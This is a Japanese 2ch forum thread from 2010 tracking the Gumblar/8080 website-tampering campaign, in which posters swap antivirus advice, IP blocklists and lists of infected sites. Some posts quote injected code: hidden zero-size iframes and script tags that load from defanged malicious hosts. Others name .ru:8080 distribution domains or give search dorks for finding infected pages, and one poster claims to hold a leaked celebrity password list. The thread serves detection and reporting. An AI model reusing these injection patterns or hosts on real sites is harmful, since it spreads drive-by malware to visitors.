10/03/13 15:04:19
またいつ攻撃されてもおかしくないとか
現実的でないこといってびびってるのか
LANけーぶるひっこぬけ
91:名無しさん@お腹いっぱい。
10/03/13 15:06:26
神戸市関連のHPがウイルス感染、改ざん被害
URLリンク(www.kobe-np.co.jp)
92:名無しさん@お腹いっぱい。
10/03/13 15:07:41
糞狐はいつ攻撃されてもおかしくないな
ハイリスク報知だし
93:名無しさん@お腹いっぱい。
10/03/13 15:21:06
>>91
自治体は、やる気無いからなぁ
URLリンク(news.biglobe.ne.jp)
94:名無しさん@お腹いっぱい。
10/03/13 15:28:22
未だにIE6とか使ってるんだろうか
95:名無しさん@お腹いっぱい。
10/03/13 15:31:14
自治体関連掘り出していけばザックザック出てきそうだな。
どうせwindowsのパッチも当ててないし
96:名無しさん@お腹いっぱい。
10/03/13 16:44:23
自治体はその程度なのに国は今の知ったか大臣主導で情報を共有化する気だけどね。
97:名無しさん@お腹いっぱい。
10/03/13 16:52:54
>>96
機密情報をShareで全力共有しそうだなw
98:名無しさん@お腹いっぱい。
10/03/13 17:11:58
某ボランティア団体で活動してるが、団体所有のVistaはSP1のまんまだし
Adobe ReaderはVer.8のプレインストールのまま
Adobe Flash Player に関しては推して知るべし
つ~かプリインストールのセキュリティソフト期限切れてるし...
99:名無しさん@お腹いっぱい。
10/03/13 18:05:13
大規模な情報流出しないと改善されなさそうだね。
100:名無しさん@お腹いっぱい。
10/03/13 18:25:00
>>98
Avastくらい入れてやれよ、ボランティアでw
101:名無しさん@お腹いっぱい。
10/03/13 18:27:23
それがねダンナ、かてて加えて
某福祉事務所のXP、SP2のまんまだし
当然Adobe関連はプレインスコのままだし
それよりなによりファイアウォールもアンチウィルスすら入ってねーし
で、そのPC使って障がい者相手のインターネット入門講座やるんだと
102:名無しさん@お腹いっぱい。
10/03/13 18:31:13
>>100
とりあえずMSE入れたら重くて使い物にならんしorz
103:名無しさん@お腹いっぱい。
10/03/13 18:32:22
アップデートていう概念自体を持ち合わせてないだけ
104:名無しさん@お腹いっぱい。
10/03/13 18:32:39
>>101
ubuntuにシ十
105:名無しさん@お腹いっぱい。
10/03/13 18:44:35
>>101
金をもらうためにPC+回線いれたのに
それ以上に金かけたくないってことだろ
こんなのがNPO法人になって金稼ぎしてるんだよww
106:名無しさん@お腹いっぱい。
10/03/13 18:53:09
新型来ないね
107:名無しさん@お腹いっぱい。
10/03/13 19:44:27
役所なんかもっとひどくてupdateしたりすると勝手にそんなことスンナって怒られるレベル。
去年のネットでできる確定申告なんて、
新しいjava捨ててわざわざ古いバージョン入れないと動かなかった。
判明するのに子1時間悩まされた。
108:名無しさん@お腹いっぱい。
10/03/13 20:12:09
そんなの役所にかぎらんだろ
勝手にされたら困る
109:名無しさん@お腹いっぱい。
10/03/13 20:13:25
こともある
110:名無しさん@お腹いっぱい。
10/03/13 20:30:06
まともに管理してるところなら多少遅くなってもUpdateする予定だから勝手にやると怒られる
管理してないところは金がかからなくて業務に支障がなければ「勝手にどうぞ」てな感じ
保守とセキュリティ対策は業務妨害とコストとしてしか見ないのが見識のない組織の現実
111:名無しさん@お腹いっぱい。
10/03/13 20:31:37
>>108
言葉足らずだった。
中途で役所のSEで入った友達の話。
あまりにも古い形式使っててセキュリティ的にヤバイって言って
議題に上げても一蹴。
『後から入ってきたくせに勝手にそんなことマンドクサそうなこと言い出すな!』
ってニュアンスだったそうな。
112:名無しさん@お腹いっぱい。
10/03/13 20:37:28
そうかそうか
113:名無しさん@お腹いっぱい。
10/03/13 20:46:24
>>100
ボランティアの人、あの警告音に驚くだろうなぁ・・・
114:名無しさん@お腹いっぱい。
10/03/13 20:47:40
avast5になって音変わったんじゃなかったっけ。
115:名無しさん@お腹いっぱい。
10/03/13 20:51:37
改ざんされた偽セキュリティソフトのWebページを踏んだ様で、PCを立ち上げると
「WARNING! 40 infections found!!!'」の表示が出て他へ他へ進めません。
Internet ExplorerやOutlook Expressすら立ち上げることができず困っています。
PCはだいぶ前のNEC VR770Cという一体型で、今になって使用書を良く読むと
HDDに再セットアップ用データが入っていて再セットアップ用CD-ROMが作れた
様ですが、恥ずかしながらそれもしていません。
何とかこの哀れなPCを復活させる手はないでしょうか?
蛇足ながら、窓から投げ捨てるには高層マンションの25階で危険すぎるのです。
116:名無しさん@お腹いっぱい。
10/03/13 20:55:17
OS買って来て入れなおせ
117:名無しさん@お腹いっぱい。
10/03/13 21:01:26
力一杯床に叩き付けろ
118:名無しさん@お腹いっぱい。
10/03/13 21:06:03
/ ̄ ̄\
/ \ ____
|:::::: | / \
. |::::::::::: | / \
|:::::::: |/ -━- -━- \
. |:::::::::::::: } | (__人__) |
. ヽ:::::::::::::: } \ ` ⌒´ _/
ヽ:::::::::: ノ | \
/:::::::::::: く | | | |
-―――|:::::::::::::::: \-―┴┴―――┴┴―
/ ̄ ̄\
/ \ ____
|:::::: | / \
. |::::::::::: | / \
|:::::::: |/ -━- -━- \
. |:::::::::::::: } | (__人__) |
. ヽ:::::::::::::: } \ ` ⌒´ _/
ヽ:::::::::: ノ | \
/:::::::::::: く | | | |
-―――|:::::::::::::::: \-―┴┴―――┴┴―
/ ̄ ̄\
/ \ ____
| | / \
. | -━- -━-| / \
|::::: (__人__) |/ -━- -━- \
. |::::::::` ⌒´ } | (__人__) |
. ヽ:::::::::::: } \ ` ⌒´ _/
ヽ:::::::::: ノ | \
/:::::::::::: く | | | |
-―――|:::::::::::::::: \-―┴┴―――┴┴―
119:名無しさん@お腹いっぱい。
10/03/13 21:45:38
起動時にF8とか連打して出るメニューにリカバリーとかなかったっけバリュースター
120:名無しさん@お腹いっぱい。
10/03/13 21:50:36
>>115
NECに電話して型番とシリアルナンバー伝えて有料リカバリディスク買えばいいんじゃ
121:名無しさん@お腹いっぱい。
10/03/13 21:59:18
>>115
お気に入りの型番なんだ
へぇ~この板のアンチとおんなじジャン~
122:名無しさん@お腹いっぱい。
10/03/13 22:01:21
ソフト入手しようと思ったらavast!が怒ったんだけど感染してる?
Hardwaremania BlackBox
://blackbox●hardwaremania●com/en/home
123:名無しさん@お腹いっぱい。
10/03/13 22:26:19
>>122
/js/app.js
124:名無しさん@お腹いっぱい。
10/03/13 22:33:16
>>122
Webシールドが遮ったなら大丈夫
125:名無しさん@お腹いっぱい。
10/03/13 22:56:23
>>113
ドラクエノレベルアップの音
にでも変えとけw
126:名無しさん@お腹いっぱい。
10/03/14 10:07:04
そういえば、一時期出てた不審なIPアドレスどうこうとかはまだあるの?
今、自分が遮断設定にしてるのは
67.212.81.67
67.215.237.98
67.215.238.194
67.215.246.34
91.215.156.74
91.215.156.75
91.215.156.76
94.76.250.73
94.229.65.174
193.104.12.20
195.24.76.250
210.51.166.228
216.45.48.66
127:名無しさん@お腹いっぱい。
10/03/14 10:23:18
ああほんと(苦笑)
128:名無しさん@お腹いっぱい。
10/03/14 10:27:04
感染してから小手先で情報送信防げるとかしてもね
129:名無しさん@お腹いっぱい。
10/03/14 10:43:34
>>126
0:基本的な対策(アップデート等)を行っておく ←必須
1:JAVAScriptをOFFしておく ←推奨
2:「:8080/」を含むURLを全て蹴る ←可能なら
130:名無しさん@お腹いっぱい。
10/03/14 10:48:02
お前ら8080って何て呼んでる?
・ハチゼロハチゼロ?
・ハチマルハチマル?
・ハッセンハチジュウ?
131:名無しさん@お腹いっぱい。
10/03/14 10:49:49
>>129
1と2は不要
132:名無しさん@お腹いっぱい。
10/03/14 10:52:34
そこまでするなら
flashとpdfリーダーアンインストールしろってこった
133:名無しさん@お腹いっぱい。
10/03/14 11:03:22
1はpdfビューアのJavaScriptをオフ、ならありじゃね?
134:名無しさん@お腹いっぱい。
10/03/14 12:28:35
ガンブラー:神戸市のサイトに感染。被害拡大中
スレリンク(news板)
135:名無しさん@お腹いっぱい。
10/03/14 12:44:29
>>134
>>91
136:名無しさん@お腹いっぱい。
10/03/14 12:45:59
このサイトは改竄されてるわ
_,,.. -─-- 、,
,.::'´:::::::::::::::::::::::::::`::..、___ | _/
/::::::::/:::;:::::::i:::::::::;::::::::::::::く 〈7´ ピキーン
,'::::::::;'::::/:::/;ハ::::::;ハ:::::i:::::::ハ /
|::::::::|:::::|::/メ、|__/ |_ィ!、::::!::! ∧
‐ ─.|::::::::|:::::|7´ ∩ ∩Y|::|::| ─ヘ/ ':, /`ーw─'^ー ─ -
|::::::::|::::八. り . り 〈::」:」 ∨
|::::::::|:::::|"" _ ",ハ|
!::::::::|:::::|>,、 __,.. イ:::::|
,':::::::::|:::::|´ \_「`\:::|::::::| _________
./:::::::::::;\ト、 }_X_{ .〉、:::::| // /
/:::::::::::/ 、|\/ム`ァl/ \! // Tewinabook. /
/:::::::::::;' ´ ̄/>‐-、 ./ >‐// /
:::::::::::::/|. | | 、ン^'く::\ // /
─‐‐!、__|.」-‐'ーヘ‐'─'` ー//________/──
/l二二]O)_l王l_l三l__oOン
ヽ、_____ノ
137:名無しさん@お腹いっぱい。
10/03/14 13:24:25
キモイもん貼るなよ
138:名無しさん@お腹いっぱい。
10/03/14 13:29:46
キモイ顔の奴はレスするなよ
139:名無しさん@お腹いっぱい。
10/03/14 15:53:53
じゃあ2ch動かなくなるじゃん
140:コテハン
10/03/14 17:54:42
.substr連発型
//www●w-com●jp/
チェッカー3は未対応だが・・・作者殿はどこ?
141:コテハン
10/03/14 18:01:56
www●w-com●jp
↓
/1home/?S=D
/2company/?S=D
/2company/?D=A
/3business/?N=A
/5reference/?N=D
/5reference/?M=D
/5reference/?N=A
/5reference/?S=D
142:名無しさん@お腹いっぱい。
10/03/14 18:26:05
飽きたので開発終了です
143:名無しさん@お腹いっぱい。
10/03/14 18:30:07
スレチで申し訳ないんだけど、今使ってるフリーのアンチウィルスってガンブラーとか8080には弱いみたいだから、これを期に有償ソフトに変えようかと思ってるんだけどそれにするか悩む
AV-TEST.orgでいつも優秀で、ヒューリスティックも高性能なG Data、
AV-TESTでは二番目ながらかなり高性能なマカフィー、
AV-T(ryでは上位3位には入らないけど、URLリンク(honeywhales.com)では圧倒的に高性能なノートン
まぁぶっちゃけ新種の対応には厳しいからどれでもダメなんだろうけどw
一般的にはG Dataを選ぶんだろうけど、gredAVアクセラレータとは共存できないみたいだし、無難にマカフィーでも良いけど除外設定できないし、何よりhoneywhalesの結果が引っかかる
確かにhoneywhalesの地図にあるVirusTotalの結果を見るとマカフィーやG Dataでは検出できなくてノートンでは検出できるってものが多いんだよね
それに、AV-TEST.orgとか、AV Comparativesのレポートは裏でお金の取引をして順位を上げてるなんて噂もあるし(嘘だと思うけど
どっちを信用すれば良いのかな?
ここのスレには毎度お世話になってるから、今回も書き込んでみました。宜しければご回答お願いします
144:名無しさん@お腹いっぱい。
10/03/14 18:31:01
>>143
そんなもんに神経使う前に日頃からの対策に神経を使ってください
145:143
10/03/14 18:38:00
>>144
大丈夫既に各ソフトウェアのアップデートもしてるし、Firefox+Noscript+RequestPolicyでリダイレクトを防止して、AdblockPlusで8080ドメインをブロックしてる
146:名無しさん@お腹いっぱい。
10/03/14 18:39:04
>>143
サイト改竄に対してセキュリティソフト依存は危険。
極端な話、穴をしっかり塞いでおけばノーガードでも感染しない。
147:143
10/03/14 18:46:21
>>146
あーそういえば穴を塞いでおけば大丈夫だったね。基本を忘れてた
セキュリティソフト依存が危険な事はわかってる。
だけど、ゼロデイ状態とかになったときの為とか、ガンブラー以外のウィルスに対しても広く対応させる為とかで、補助的な意味でウィルス対策ソフトの乗り換えを考えてる
148:名無しさん@お腹いっぱい。
10/03/14 18:52:05
3行目なら完全にスレチ
149:名無しさん@お腹いっぱい。
10/03/14 18:52:10
ソースの最後の方に function~ゴチャゴチャ書いてたら
すべてアウトでいいの?
.>>5 で 反応しないんだけど
150:名無しさん@お腹いっぱい。
10/03/14 18:53:18
どうやったらそんな発想ができるんだろう……
151:名無しさん@お腹いっぱい。
10/03/14 19:08:06
> 反応しないんだけど
無害だろw
152:名無しさん@お腹いっぱい。
10/03/14 19:11:12
トレンドマイクロだと
Possible_Gumb-3 と 反応したから
確かめてみたかった
153:名無しさん@お腹いっぱい。
10/03/14 19:25:41
>>147
ゼロデイならほとんどの場合セキュソフトのヒューリスティックに引っかかるかどうかだから
下手すると乗り換え前のソフトだと検出したが乗り換え後のソフトだとスルーと言うこともありえるぞ
154:名無しさん@お腹いっぱい。
10/03/14 19:36:25
>>147
ある程度わかってる人なら乗り換えても問題はないと思うけど
そうじゃない人には慣れてるの使っとけといってる
実際そこまで大差ないし
今変えたとして直後にそれが調子悪くなったらまた変えるの?
毎回なんかあるごとに乗り換えてたらキリがなくね?
155:名無しさん@お腹いっぱい。
10/03/14 19:42:57
115です。2ちゃんネラーって、ガヤガヤとうるさいだけで全く当てになりませんね。
ろくなレスが付かないので同じ質問をOKEaveに書き込んだら、たちどころに適切な
役立つ投稿が何通もはいりました。
156:名無しさん@お腹いっぱい。
10/03/14 19:46:11
OKWaveなら知ってるお^^
157:名無しさん@お腹いっぱい。
10/03/14 19:50:01
>>155
>>115はスレチ。
だから誰もマトモに答えなかった。以上。
158:名無しさん@お腹いっぱい。
10/03/14 19:54:53
どう見てもなりすましなのにいちいち釣られるなよ・・・
159:名無しさん@お腹いっぱい。
10/03/14 21:36:05
>>153
あーそっかwヒューリスティックになるんだよなw
確かノートンとマカフィーは・・・微妙だったような
前入れてたのはAntiVirとMSEだったからなかなかの性能だったよなー
親がノートン使ってて、3台までインストール可能ってなってたからさっき入れてみたけど、調べてみたらオンデマンドもヒューリスティックもAntiVirよりも下だったな@AVComparatives
>>154
大差ないのか・・・orz
確かにキリないなぁ。どうしよう
使い慣れてるのかー。だったらフリーのになるのかなぁ
確かに、ずべてのウィルスを検出できる製品なんてないし、ウィルスも日々大量生産されてるわけだし、AV-TESTとかはあくまで一例であって、実際はそんなに大差ないのかもしれないな
とりあえずテスト機関のレポートにあまりとらわれず、よく考えてみる事にする。答えてくれた人、ありがとうございます。
160:143
10/03/14 21:37:21
連レススマソ。↑は143です
161:名無しさん@お腹いっぱい。
10/03/14 22:00:02
もうええっちゅーねん
どんだけ語るんだよ
162:名無しさん@お腹いっぱい。
10/03/14 22:34:26
>>149
埋め込みに失敗(?)とかコメントアウトされてるとかで
実際には機能してないのもある
163:名無しさん@お腹いっぱい。
10/03/15 07:56:39
NoScript使えよ
164:名無しさん@お腹いっぱい。
10/03/15 08:06:12
おことわりします
165:名無しさん@お腹いっぱい。
10/03/15 15:54:12
下火になってきたみたいだな
166:コテハン
10/03/15 16:19:38
>>142 orz
ic-isweb●hp●infoseek●co●jp/
isay●livedoor●biz/ ←!
<!--トロイを絶賛配布中!(無料)-->
www●plci●net/egf/
<!--更新履歴(不要の場合はここから削除)-->
<div class="module-archives module">
<div class="module-header"
<script>var (以下略
・・・コードは必要なんでしょうカネ?
167:名無しさん@お腹いっぱい。
10/03/15 16:24:44
嫌な無料配布だな
168:八頭 ◆YAGApwSaEw
10/03/16 00:33:10
ヒマそうな冗談者は
腕試しにフランスドメイン(fr)洗ってみてくれ
169:コテハン
10/03/16 01:21:04
>>168
なして?
170:八頭 ◆YAGApwSaEw
10/03/16 01:51:56
URLリンク(i40.tinypic.com)
ここんとこずっと仏が被害で突出しているみたい
171:八頭 ◆YAGApwSaEw
10/03/16 01:57:07
オマケ
国名略号 and 国名ドメイン早見表
URLリンク(www1.coralnet.or.jp)
EU諸国 マップ
URLリンク(www.d.umn.edu)
172:名無しさん@お腹いっぱい。
10/03/16 02:26:08
genom氏のサイトには特定の個人や団体の情報なんて書かれてないだろ。
何でわざわざモザイクなんてかけるんだ?
173:名無しさん@お腹いっぱい。
10/03/16 03:01:09
その読み間違いは初めて見た
174:名無しさん@お腹いっぱい。
10/03/16 03:25:14
avast!スレより
www●ebookjapan●jp/ebj/title/10429.html
175:コテハン
10/03/16 03:35:38
>>168
けんさくわーど
"new String();" "new Date();" "new Array();" -JAVA -JAVAScript site:.fr
ぐーぐる先生
URLリンク(www.google.co.jp)
+%22new+Array%28%22+-JAVA+-JAVAScript+site%3A.fr&btnG=%E6%A4%9C%E7%B4
%A2&hl=ja&lr=&sa=2
びんぐ
URLリンク(www.bing.com)
29%3B%22+%22new+Array%28%29%3B%22+-JAVA+-JAVAScript+site%3A.fr&go=&fo
rm=QBLH&filt=all
禿(やふー)
URLリンク(search.yahoo.co.jp)
te%28%29%3B%22+%22new+Array%28%29%3B%22+-JAVA+-JAVAScript+site%3A.fr&
ei=UTF-8&fr=top_ga1_sa&x=wrt
176:名無しさん@お腹いっぱい。
10/03/16 03:43:34
>>170
それ、スクリプトが埋まってるって意味で言ってる?
177:コテハン
10/03/16 03:44:30
>>174
ずいぶんアレな仕込み方だが・・・
//w●robints●us/us●js
↓
//w●robints●us/cnzz●html
//w●robints●us/614●html
//w●robints●us/jf●html
//w●robints●us/jg●html
この先はシラネ
178:名無しさん@お腹いっぱい。
10/03/16 07:11:05
※4発装填中
URLリンク(w)<)●robints.us/cnzz.html width=0 height=0></iframe>");
document.write("<iframe src=URLリンク(w)<)●robints.us/jf.html width=0 height=0></iframe>");
document.write("<iframe src=URLリンク(w)<)
自国で撒くと足がつきやすいから他国に撒く
どうせ撒くなら足がつきにくい国はどこか?
答え.ウイルス黒人街中国ロシア
でもどうして未だにMS06-014なのか?614.html
179:名無しさん@お腹いっぱい。
10/03/16 08:02:41
Malwarebytes' Anti-Malware 公式サイト
URLリンク(www.malwarebytes.org)
180:名無しさん@お腹いっぱい。
10/03/16 10:28:14
e-bookjapan、凸ってみた。
ツイッターのアカウントあるけど、こっちも凸ってみる?
181:名無しさん@お腹いっぱい。
10/03/16 10:28:47
もう埋め込みの方は更新しないのかな。
毎週更新されて楽しかったのに。
182:名無しさん@お腹いっぱい。
10/03/16 12:21:30
>>181
戦略的撤退(休眠)のような気がする
183:名無しさん@お腹いっぱい。
10/03/16 14:54:43
e-bookjapan対応速かった。
マトモなとこだとホッとするな。
184:名無しさん@お腹いっぱい。
10/03/16 15:20:57
凸乙
メンテになってるな
185:名無しさん@お腹いっぱい。
10/03/16 19:44:58
「おいくつですか?」
「キャー痴漢!」
なんてリスク背負いたくないしな
186:名無しさん@お腹いっぱい。
10/03/16 19:58:40
いつの間にかflashplayerが手動DL出来なくなっているんだが
最新版を直DLできるURLとかないですかね?(以前は、ここをクリックで手動DL可能だった)
187:名無しさん@お腹いっぱい。
10/03/16 20:23:15
>>186
最新版ならいつもこのアドレス
URLリンク(fpdownload.adobe.com)
URLリンク(fpdownload.adobe.com)
188:名無しさん@お腹いっぱい。
10/03/16 20:30:15
>>187
ありがとう
しかし・・少し前までは通常ページからダウンロードを選択→ブラウザのブロック機能で
インストーラの発動を止める→ここをクリックで手動DLが可能だったのに何というせこさ・・
189:名無しさん@お腹いっぱい。
10/03/16 22:09:19
OperaやChromeならオフラインインストーラが落ちてきたはず…
190:名無しさん@お腹いっぱい。
10/03/16 23:03:42
ebookjapan復帰した。
「ウイルス感染確認のお願い」のページで、なぜアバスト!を勧めてるのかは不明だけど。
>>184
トップページではちゃんと「ウイルス感染の連絡があった」と記述されてた。
サブページはメンテって記述。
マトモな対応だ。これが普通だよな。
191:名無しさん@お腹いっぱい。
10/03/16 23:07:18
なんかこのスレで初めてマトモな対応をしたサイトを見た気がする
アバスト!は無料だし今回genoウィルスにまじめに取り組んでる少ないウィルス対策ソフトだからじゃないかなと推測
192:名無しさん@お腹いっぱい。
10/03/16 23:08:16
あ、そうそう、忘れてた。
puremis●net/
mrtb●puremis●net/
jmt●puremis●net/
随分ほったらかしにしてるみたい。
193:名無しさん@お腹いっぱい。
10/03/17 00:22:16
>>192
無害だからね
194:名無しさん@お腹いっぱい。
10/03/17 01:22:17
>>192
おちゅ。
エックスサーバーにつーほーしますた。
>>193
?
195:名無しさん@お腹いっぱい。
10/03/17 04:14:40
ebookjapan陥落時のキャッシュを拾ってみた
■アクセス注意!
URLリンク(74.125.153.132)
<meta name="Keywords" content="~~中略~~
,貸本マンガ<Script src=hXXp://w●robints●us/us●js></Script>" />
変な所に仕込んであるしw
196:名無しさん@お腹いっぱい。
10/03/17 04:30:43
アクセス注意って言うぐらいなら.を●に変えろよ
それともアレかあえてひっかける釣りか?
197:名無しさん@お腹いっぱい。
10/03/17 07:27:58
芸能人ブログID・パス流出、ホリプロ元社員逮捕
URLリンク(www.yomiuri.co.jp)
インターネット広告会社「サイバーエージェント」(東京都渋谷区)が運営するブログサイト「アメーバブログ(アメブロ)」を
利用していた芸能人のIDとパスワードがネット上に流出した事件で、警視庁が、大手芸能事務所「ホリプロ」(目黒区)
元契約社員岡田邦彦容疑者(30)を不正アクセス禁止法違反の疑いで逮捕していたことがわかった。
逮捕は3月13日。
捜査関係者によると、岡田容疑者は今年1月1日未明、タレントの藤本美貴さんのブログに、藤本さんのIDとパスワードを
使って不正に侵入し、芸能人445人分のIDとパスワードなどが記載された個人情報リストを張り付けた疑い。その結果、
リストは藤本さんのブログを閲覧した人がクリックすると、ダウンロードできるようになっていた。
このリストはサイバー社の内部文書。同社社員が日頃から仕事上の付き合いのあった岡田容疑者に誤ってメールしたのが原因だった。
アメブロは日記形式のホームページ。サイバー社によると、事件後、リストの芸能人らのパスワードは変更されており、流出による被害は確認されていない。
(2010年3月17日03時03分 読売新聞)
198:名無しさん@お腹いっぱい。
10/03/17 08:52:54
>>197
ホリプロの元社員も悪いけどメールで送ったサイバーの社員も罰せられるべきだよな
199:名無しさん@お腹いっぱい。
10/03/17 09:29:44
スレチ
200:名無しさん@お腹いっぱい。
10/03/17 10:20:14
ID分かれば後は力押し
ゲイツは本当に便利なチートマシンを作ってくれたぜ
201:名無しさん@お腹いっぱい。
10/03/17 10:25:01
>>197
パスワード送られてきたらログインしたくなっちゃうかもな
俺もミキティのパスが送られてきたらログインしちゃったかもしれん
でもリストをブログに貼り付けることはしないわな
202:名無しさん@お腹いっぱい。
10/03/17 11:12:49
あぁ、そのリスト、おれもブログみたらダウソされてきたので持ってるわ
すげーいい加減なexcel管理だなぁと思った
もっときれいに管理してやれよ
あと、芸能人なのに自分の誕生日パスワードにするのはやめろ
公開されてるのに無用心すぎるだろw
203:名無しさん@お腹いっぱい。
10/03/17 11:34:32
顧客の個人情報を暗号化もせずにメールで送る非常識なクソ企業
日常的にずさんな管理しているんだろう。
204:名無しさん@お腹いっぱい。
10/03/17 13:19:05
【フリー併用】avast!+MSE+gred AntiVirusのトリプルエンジン【最強仕様】
以下の順番にインストールする。
avast! Free Antivirus のダウンロード (日本語公式ページ)
URLリンク(www.avast.com)
ウイルス、スパイウェア、マルウェア対策 | Microsoft Security Essentials
URLリンク(www.microsoft.com)
gred Anti Virus アクセラレータ | ダウンロード
URLリンク(www.gred.jp)
(ちなみに併用使用でも問題はありません)
205:名無しさん@お腹いっぱい。
10/03/17 13:26:56
釣りだろうけど
実験モルモットな組み合わせだなw
206:名無しさん@お腹いっぱい。
10/03/17 13:35:10
avastとmseを併用する価値が見出せない
併用は監視の重複で権利の奪い合いになってスルーが起きやすくなるからかえって性能が落ちる
いろんなとこにコピペしまくってるとこ見ると被害者を増やしたいのかね
207:名無しさん@お腹いっぱい。
10/03/17 13:37:13
>>204
avast!++gred AntiVirus
MSE+gred AntiVirus
こうだろ?
208:名無しさん@お腹いっぱい。
10/03/17 14:10:55
Avira+avast!(4.8のwebシールドのみ)+comodo+SpyBot(免疫化のみ)
この組み合わせは良いぞ
209:名無しさん@お腹いっぱい。
10/03/17 14:22:23
avast!+MSE(avastの検疫ファイルを除外指定)で無問題。
210:名無しさん@お腹いっぱい。
10/03/17 14:36:16
トリプルエンジン(笑)
211:名無しさん@お腹いっぱい。
10/03/17 15:45:55
>>2以上の対策は自己満足だから好きにすればいいけど、ウザいからいちいち宣伝しないでね。
212:名無しさん@お腹いっぱい。
10/03/17 16:24:54
ちっ、うるせーな
213:名無しさん@お腹いっぱい。
10/03/17 16:27:21
いやあ彼ももう忘れ去られた存在だねえ
214:名無しさん@お腹いっぱい。
10/03/17 18:34:30
>>210
あ?ルナスケープなめてんのか?
215:名無しさん@お腹いっぱい。
10/03/17 20:01:13
ルナスケープってなにそれ食えんの?
216:名無しさん@お腹いっぱい。
10/03/17 21:10:29
Adobe Readerをアンインスコして、他社製のPDF読み込みソフトを導入するのはGumbler対策になる?ならない?
217:名無しさん@お腹いっぱい。
10/03/17 21:36:14
ここで断言できる人はいないので作ってる人にきいてください
218:名無しさん@お腹いっぱい。
10/03/17 23:18:14
>>216
Gumblar対策だけならReaderのままでもブラウザから自動起動されないようにすればいいだけだろ
219:名無しさん@お腹いっぱい。
10/03/18 12:28:44
>>216
なる
>>217
断言ってお前馬鹿か?
220:名無しさん@お腹いっぱい。
10/03/18 12:57:33
クチチ
221:名無しさん@お腹いっぱい。
10/03/18 13:17:57
217じゃないが…
>>216に回答すりゃ、それは断言になるだろ
なに?よくわからないあいまいな答えが欲しかったの?
222:名無しさん@お腹いっぱい。
10/03/18 15:00:52
だってそりゃお前、日本人だもの。
「どちらともいえない」が一番しっくりくるに決まってるべ。
223:名無しさん@お腹いっぱい。
10/03/18 17:46:58
また変化する可能性もあるのに大丈夫とはいえないだろ
224:名無しさん@お腹いっぱい。
10/03/18 18:11:35
Adobe Readerだって最新版使えばいいだけ
前のバージョンだってJavaScript無効にすればいいだけ
他社製にする必要もない
225:名無しさん@お腹いっぱい。
10/03/18 18:28:17
既出のこれらのURLのスクリプトが変わったかもしれない
今まで検出していたavast!がスルーするようになった
VTの結果もほとんど: 3/42 (7.15%)
mogulclub●com/BANDS_AND_GIGS/index_CIARA●html
s1●shard●jp/dreaming/
s1●shard●jp/dreaming/mitubishiucar/index●html
www●avis●ne●jp/~muranaka/
www●hct●zaq●ne●jp/cpacs503/
www●i-paradise5●jp/~simple/otona/index●php
www●kadoma-c●com
www●kikuyakikai●com
www●sesica●co●jp
URLリンク(www.virustotal.com)
URLリンク(www.virustotal.com)
URLリンク(www.virustotal.com)
URLリンク(www.virustotal.com)
URLリンク(www.virustotal.com)
URLリンク(www.virustotal.com)
URLリンク(www.virustotal.com)
URLリンク(www.virustotal.com)
URLリンク(www.virustotal.com)
226:名無しさん@お腹いっぱい。
10/03/18 19:12:20
ただアドビ製品は今までMS以上の放置プレイで脆弱性修正を怠ってたから
最新版だろうがJavaScriptオフだろうがまだまだ山ほど脆弱性が残ってそうなのが怖いんだよな
227:名無しさん@お腹いっぱい。
10/03/18 19:46:04
>>192
403になっとるな。本に紹介されたばっかりなのにね。
これ、お詫び無しパターンだぜ。
228:名無しさん@お腹いっぱい。
10/03/18 20:05:11
>>225
s1●shard●jp/dreaming/
電凸完了
229:名無しさん@お腹いっぱい。
10/03/18 20:25:41
>>225
www●avis●ne●jp/~muranaka/
電凸完了
230:名無しさん@お腹いっぱい。
10/03/18 20:50:40
>>225
www●hct●zaq●ne●jp/cpacs503/
電凸完了
231:名無しさん@お腹いっぱい。
10/03/18 20:53:27
あとは明日以降
232:名無しさん@お腹いっぱい。
10/03/18 21:15:20
これらはたぶん再発
e-risingsun●net
faac3020●cpinet●jp/
www4●ocn●ne●jp/~ikl/member/index●htm
www●mfreep●com →スクリプトはあるがaguseでは外部と接続するオブジェクトを検出しなかった
VTの結果は 3~4/42
URLリンク(www.virustotal.com)
URLリンク(www.virustotal.com)
URLリンク(www.virustotal.com)
URLリンク(www.virustotal.com)
233:名無しさん@お腹いっぱい。
10/03/19 00:02:01
>>225
挿入した不要な文字を函数で削除するタイプ
主要部はこれまでの応用だけど…
BuyTheBlenderma●ru:8080
404 Not Found
404 Not Found
YourSuperPool●ru:8080
SuperSuperMall●ru:8080
TheBlenderTutorial●ru:8080
TheBlenderTutorial●ru:8080
YourSuperPool●ru:8080
ExcellentBlender●ru:8080
どれもドメイン名に大文字が入ってるんだけど、
ひょっとして、これだけで検出できなくなるとか?
234:名無しさん@お腹いっぱい。
10/03/19 00:15:49
>> 232
これも大文字入り
SuperSuperMall●ru
TheBlenderTv●ru
BuyTheBlender●ru
YourSuperPool●ru
> スクリプトはあるがaguseでは外部と接続するオブジェクトを検出しなかった
どれも、この5 IPのラウンドロピンですね
91●121●7●26
91●121●24●139
91●121●134●58
91●121●137●124
91●121●163●215
235:名無しさん@お腹いっぱい。
10/03/19 08:53:54
電凸とか男前過ぎる。
236:名無しさん@お腹いっぱい。
10/03/19 10:12:22
route: 91.121.0.0/16
descr: OVH ISP
descr: Paris, France
origin: AS16276
ここに電凸できれば、超男前だな
237:名無しさん@お腹いっぱい。
10/03/19 10:14:01
www●kikuyakikai●com
感染している事を知っているにもかかわらず放置
電話しても担当者はいない、ここは会社ではなく個人の家
などと訳のわからない対応を行い、会社としての責任を果たしていない。
238:名無しさん@お腹いっぱい。
10/03/19 10:17:57
googleから客来ないから潰れますよ、って言えばいい
239:名無しさん@お腹いっぱい。
10/03/19 10:43:20
>>229
修復したけど感染告知無し。
こういう宿は泊まっても不快な思いをするだけだろうな。
240:名無しさん@お腹いっぱい。
10/03/19 15:11:31
改竄されすぎw
//www●aquaview●jp/q_a/index●html
241:名無しさん@お腹いっぱい。
10/03/19 16:25:11
//www●kanone●jp/
242:名無しさん@お腹いっぱい。
10/03/19 16:30:22
俺がアクセスしたページに限って改竄されてて笑いました
243:名無しさん@お腹いっぱい。
10/03/19 16:58:39
>>232とかのVTで検出成功してるアンチウイルスって何?
avast、AVG、カスペ、ノートン、G-DATA辺り?
244:名無しさん@お腹いっぱい。
10/03/19 17:17:57
>>237
確認の為に電凸してみました。ワロタww
GMOインターネット株式会社に凸。。
んで、完了。
245:名無しさん@お腹いっぱい。
10/03/19 18:06:58
>>206
亀レスで申し訳ない
それって、そもそもスルーされて監視が出来ないってことだよね?
例えば3つアンチウィルスを入れてたとしてそのうち一つでしか検出出来ないウィルスだとする
その唯一検出できる製品がスルーして、取りこぼすっていう可能性もある?
